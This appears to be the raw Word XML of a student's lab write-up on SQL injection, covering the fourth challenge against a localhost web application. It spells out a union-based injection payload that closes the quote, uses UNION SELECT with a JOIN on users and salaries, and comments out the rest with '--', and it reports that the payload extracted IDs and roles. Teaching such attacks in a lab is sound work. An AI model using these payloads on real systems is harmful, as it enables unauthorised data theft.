                      </w:r>
                      <w:r w:rsidR="00560F06">
                        <w:t xml:space="preserve">For the fourth challenge, </w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">I have included the outputs for the options username = admin, username = jack, and username = lord. To observe outputs for </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">username = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>alex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B13699">
                        <w:t>and</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> username =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karen</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">, </w:t>
                      </w:r>
                      <w:r w:rsidR="001E02B9">
                        <w:t xml:space="preserve">before entering my payload to the end of the localhost URL, </w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">you can change the part which comes right after the “username=” part in the localhost link to the </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00B13699">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>alex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B13699">
                        <w:t>and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karen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Pr="00B13699">
                        <w:t>respectively</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09DBD74C" w14:textId="51DF2546" w:rsidR="00560F06" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                    <w:p w14:paraId="78A5BDC7" w14:textId="77777777" w:rsidR="00560F06" w:rsidRPr="00B13699" w:rsidRDefault="00560F06" w:rsidP="00B13699"/>
                    <w:p w14:paraId="47C35F59" w14:textId="77777777" w:rsidR="00B13699" w:rsidRDefault="00B13699"/>
                    <w:p w14:paraId="350F6544" w14:textId="77777777" w:rsidR="00B13699" w:rsidRDefault="00B1369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E87E6E" wp14:editId="23472588">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-796494</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>576813</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7264400" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Metin Kutus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E3C89" w14:textId="24EF1606" w:rsidR="00560F06" w:rsidRPr="00B90F0C" w:rsidRDefault="00560F06" w:rsidP="00560F06">
                            <w:pPr>
                              <w:pStyle w:val="ResimYazs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Fourth Challenge Screenshot 9 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 xml:space="preserve">(for the case where the username = </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>lord</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B90F0C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87E6E" id="Metin Kutusu 31" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;margin-left:-62.7pt;margin-top:45.4pt;width:572pt;height:.0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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="001E3C89" w14:textId="24EF1606" w:rsidR="00560F06" w:rsidRPr="00B90F0C" w:rsidRDefault="00560F06" w:rsidP="00560F06">
                      <w:pPr>
                        <w:pStyle w:val="ResimYazs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Fourth Challenge Screenshot </w:t>
                      </w:r>
                      <w:r>
                        <w:t>9</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">(for the case where the username = </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>lord</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C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971DEE5" w14:textId="117F2DC8" w:rsidR="00B13699" w:rsidRPr="00B13699" w:rsidRDefault="00560F06" w:rsidP="00B13699">
      <w:pPr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70C0522" wp14:editId="47D5520C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-832683</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-782349</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7415868" cy="7508147"/>
                <wp:effectExtent l="0" t="0" r="13970" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Metin Kutus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5868" cy="75081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71E544" w14:textId="6BE21FA8" w:rsidR="00560F06" w:rsidRDefault="00560F06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F4665C">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>CONTINUAT</w:t>
                            </w:r>
                            <w:r w:rsidR="00F4665C" w:rsidRPr="00F4665C">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>ION OF THE EXPLANATION OF THE FOURTH CHALLENGE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5CE5709B" w14:textId="691DDED2" w:rsidR="00F4665C" w:rsidRDefault="00F4665C" w:rsidP="006F18D3">
                            <w:pPr>
                              <w:spacing w:line="360" w:lineRule="auto"/>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="51F8DF1A" w14:textId="5071F71E" w:rsidR="004E7986" w:rsidRDefault="008151D2" w:rsidP="006F18D3">
                            <w:pPr>
                              <w:spacing w:line="276" w:lineRule="auto"/>
                              <w:ind w:firstLine="708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  <w:r>
                              <w:t>In this challenge,</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8">
                              <w:t xml:space="preserve"> initially, I have </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00E31CA8">
                              <w:t>choosen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00E31CA8">
                              <w:t xml:space="preserve"> the username as </w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00E31CA8">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>“admin”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8">
                              <w:t xml:space="preserve">.  However, this username can also be chosen </w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve">as </w:t>
                            </w:r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“</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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alex</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve">, </w:t>
                            </w:r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“</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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karen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve">, </w:t>
                            </w:r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“lord”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve">, or </w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA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“jack”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t>.</w:t>
                            </w:r>
                            <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> After I selected the username as “admin”</w:t>
                            </w:r>
                            <w:r w:rsidR="00213D38" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t>;</w:t>
                            </w:r>
                            <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> the system added the </w:t>
                            </w:r>
                            <w:r w:rsidR="00D15A47" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                              </w:rPr>
                              <w:t xml:space="preserve">“ </w:t>
                            </w:r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OR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>U.username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</w:rPr>
                              <w:t xml:space="preserve"> = </w:t>
                            </w:r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'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admin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'</w:t>
                            </w:r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”</w:t>
                            </w:r>
                            <w:r w:rsidR="00E77B78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part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existing</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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E77B78" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>query</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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 “ </w:t>
                            </w:r>
                            <w:r w:rsidR="00D15A4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?</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00D15A4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username</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D15A4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=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00D15A4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admin</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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”</w:t>
                            </w:r>
                            <w:r w:rsidR="00D15A47"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>part</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D15A47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>existing</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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>localhost</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> link.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system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added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4233E7" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>“</w:t>
                            </w:r>
                            <w:r w:rsidR="004233E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?</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="004233E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username</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004233E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=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="004233E7" w:rsidRPr="00D15A47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admin</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004233E7" w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>”</w:t>
                            </w:r>
                            <w:r w:rsidR="004233E7">
                              <w:rPr>
                                <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
                                <w:sz w:val="26"/>
                                <w:szCs w:val="26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 w:rsidRPr="00D15A47">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>part</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004233E7" w:rsidRPr="00D15A4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existing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localhost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link</w:t>
                            </w:r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concatenated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/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added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m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y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end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>localhost</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004233E7">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> URL.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firstly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using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a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single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quotation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mark, I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closed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/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ended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starting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single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quotation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mark of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username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, since I am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supposed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perform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a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union-based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attack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this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challenge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F9178D" w:rsidRPr="00F9178D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UNION</w:t>
                            </w:r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operator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/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keyword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F9178D">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> SQL.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Subsequently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, since </w:t>
                            </w:r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I am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supposed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display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only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id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role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information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 xml:space="preserve"> final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result</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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whole</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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query</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="002F1173">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>, I</w:t>
                            </w:r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selected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id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, role,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from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ignored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(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not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displayed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)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values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rest of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using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6921C6" w:rsidRPr="006921C6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“</w:t>
                            </w:r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SELECT NULL, S.ID, NULL, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart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S.Role</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd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, NULL, NULL FROM </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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U JOIN </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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S ON (U.id=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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)</w:t>
                            </w:r>
                            <w:r w:rsidR="006921C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”</w:t>
                            </w:r>
                            <w:r w:rsidR="006921C6" w:rsidRPr="006921C6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in </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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C11C85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6921C6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this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part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selected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other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, role,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id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4E66D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as </w:t>
                            </w:r>
                            <w:r w:rsidR="000F0065" w:rsidRP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NULL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selecting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them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as </w:t>
                            </w:r>
                            <w:r w:rsidR="00B8376C" w:rsidRPr="00B8376C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NULL,</w:t>
                            </w:r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ignored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their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values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ensured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their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values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will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not be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displayed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final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result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>query</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00B8376C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order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select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want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0F0065" w:rsidRP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SELECT</w:t>
                            </w:r>
                            <w:r w:rsid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statement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of SQL in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order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UNION-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based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queries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be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properly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executed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columns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0F0065" w:rsidRP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SELECT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statements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which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are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at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left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right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0F0065" w:rsidRP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UNION</w:t>
                            </w:r>
                            <w:r w:rsid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statement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must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same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order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Therefore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I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p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reserved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column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order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SELECT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statement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at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 w:rsidRPr="003530BB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left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0F0065" w:rsidRPr="000F0065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UNION</w:t>
                            </w:r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operator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while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constructing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SELECT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statement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at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0F0065" w:rsidRPr="003530BB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right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0F0065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UNION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operator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.</w:t>
                            </w:r>
                            <w:r w:rsidR="002A531C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use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3530BB" w:rsidRPr="003530BB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SELECT</w:t>
                            </w:r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statement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in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order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be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able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select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both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from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and salaries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, </w:t>
                            </w:r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I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j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oined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3530BB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on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userid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attribute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While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joining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those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tables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r w:rsidR="00140296" w:rsidRPr="00140296">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t>JOIN</w:t>
                            </w:r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keyword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of SQL. As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joining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condition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140296">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                              <w:t xml:space="preserve">  “</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="0014029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ON (U.id=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="0014029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r w:rsidR="00140296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)</w:t>
                            </w:r>
                            <w:r w:rsidR="00140296" w:rsidRPr="0014029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”</w:t>
                            </w:r>
                            <w:r w:rsidR="0014029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Because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r w:rsidR="0085128C" w:rsidRPr="008512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U.id</w:t>
                            </w:r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85128C" w:rsidRPr="008512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proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="008512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are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common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attributes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Moreover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="0085128C" w:rsidRPr="008512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U.id</w:t>
                            </w:r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attribute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85128C" w:rsidRPr="0085128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proofErr w:type="gram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attribute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table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are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highly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likely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primary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keys</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="0085128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Therefore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since it is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best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practice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it is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better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join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table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on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their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primary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keys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.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“</w:t>
                            </w:r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JOIN </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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salaries</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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S ON (</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/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U.id=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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S.userid</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="00904B73" w:rsidRPr="006921C6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)</w:t>
                            </w:r>
                            <w:r w:rsidR="00904B73" w:rsidRP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”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part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WHERE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command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SQL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specify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conditions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query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at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left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UNION statement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this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challenge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 am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supposed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obtain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role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information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for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with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age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40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904B73" w:rsidRPr="00904B73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12000.</w:t>
                            </w:r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considering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ese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specific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conditions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WHERE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command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as </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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follows</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00904B7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: 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“</w:t>
                            </w:r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WHERE </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart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proofErr w:type="gramEnd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&gt; 12000 AND </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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S.age</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd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&gt; 40</w:t>
                            </w:r>
                            <w:r w:rsidR="002A531C" w:rsidRP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”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.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In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this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usage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, “</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart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S.salary</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd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&gt; 12000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” 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is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for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specifying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condition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is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12000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 “</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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S.age</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="002A531C" w:rsidRP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&gt; 40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” is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for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specifying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situation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age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is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40.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ignore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comment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everything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comes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as it is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specified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SQL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syntax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="002A531C" w:rsidRP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--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(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two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>dashes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tr-TR"/>
                              </w:rPr>
                              <w:t xml:space="preserve">) </w:t>
                            </w:r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at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end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2A531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.</w:t>
                            </w:r>
                            <w:r w:rsid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After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added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to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URL; as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you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can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see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in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screenshots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provided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above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at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end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I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have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successfully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displayed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role,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information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of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users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with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age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40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salary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more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than</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004E7986" w:rsidRPr="00B8376C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12000.</w:t>
                            </w:r>
                            <w:r w:rsidR="004E798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Therefore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by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considering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corresponding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reasons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mentioned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and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related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screenshots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provided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above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, I can say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that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my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payload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is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successful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for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the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fourth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 xml:space="preserve"> </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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challenge</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="006F18D3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  <w:t>.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="684348A9" w14:textId="77777777" w:rsidR="004E7986" w:rsidRDefault="004E7986" w:rsidP="006F18D3">
                            <w:pPr>
                              <w:spacing w:line="360" w:lineRule="auto"/>
                              <w:ind w:firstLine="708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tr-TR"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="73174FAD" w14:textId="77777777" w:rsidR="00140296" w:rsidRPr="000F0065" w:rsidRDefault="00140296" w:rsidP="004E66DB">
                            <w:pPr>
                              <w:spacing w:line="360" w:lineRule="auto"/>
                              <w:ind w:firstLine="708"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5D7B0384" w14:textId="77777777" w:rsidR="00F9178D" w:rsidRDefault="00F9178D" w:rsidP="00D15A47">
                            <w:pPr>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="45FF4425" w14:textId="77777777" w:rsidR="00F9178D" w:rsidRDefault="00F9178D" w:rsidP="00D15A47">
                            <w:pPr>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:lang w:val="tr-TR"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="39FA0970" w14:textId="2C2BA4A4" w:rsidR="00F4665C" w:rsidRPr="004233E7" w:rsidRDefault="00F4665C" w:rsidP="00D15A47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C0522" id="Metin Kutusu 32" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-65.55pt;margin-top:-61.6pt;width:583.95pt;height:591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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4071E544" w14:textId="6BE21FA8" w:rsidR="00560F06" w:rsidRDefault="00560F06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F4665C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>CONTINUAT</w:t>
                      </w:r>
                      <w:r w:rsidR="00F4665C" w:rsidRPr="00F4665C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>ION OF THE EXPLANATION OF THE FOURTH CHALLENGE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5CE5709B" w14:textId="691DDED2" w:rsidR="00F4665C" w:rsidRDefault="00F4665C" w:rsidP="006F18D3">
                      <w:pPr>
                        <w:spacing w:line="360" w:lineRule="auto"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="51F8DF1A" w14:textId="5071F71E" w:rsidR="004E7986" w:rsidRDefault="008151D2" w:rsidP="006F18D3">
                      <w:pPr>
                        <w:spacing w:line="276" w:lineRule="auto"/>
                        <w:ind w:firstLine="708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  <w:r>
                        <w:t>In this challenge,</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8">
                        <w:t xml:space="preserve"> initially, I have </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00E31CA8">
                        <w:t>choosen</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00E31CA8">
                        <w:t xml:space="preserve"> the username as </w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00E31CA8">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>“admin”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8">
                        <w:t xml:space="preserve">.  However, this username can also be chosen </w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve">as </w:t>
                      </w:r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“</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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alex</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve">, </w:t>
                      </w:r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“</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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karen</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve">, </w:t>
                      </w:r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“lord”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve">, or </w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>“jack”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E31CA8" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> After I selected the username as “admin”</w:t>
                      </w:r>
                      <w:r w:rsidR="00213D38" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t>;</w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> the system added the </w:t>
                      </w:r>
                      <w:r w:rsidR="00D15A47" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                        </w:rPr>
                        <w:t xml:space="preserve">“ </w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">OR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b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>U.username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b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> = </w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78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'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admin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'</w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78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 xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>”</w:t>
                      </w:r>
                      <w:r w:rsidR="00E77B78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 xml:space="preserve">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lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>part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lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>existing</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00E77B78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E77B78" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>query</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D15A47" w:rsidRPr="00D15A47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D15A47" w:rsidRPr="00D15A47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D15A47" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">  “ </w:t>
                      </w:r>
                      <w:r w:rsidR="00D15A4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?</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00D15A4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username</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D15A4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=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00D15A4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admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D15A47" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> ”</w:t>
                      </w:r>
                      <w:r w:rsidR="00D15A47">
                        <w:rPr>
                          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00D15A47" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
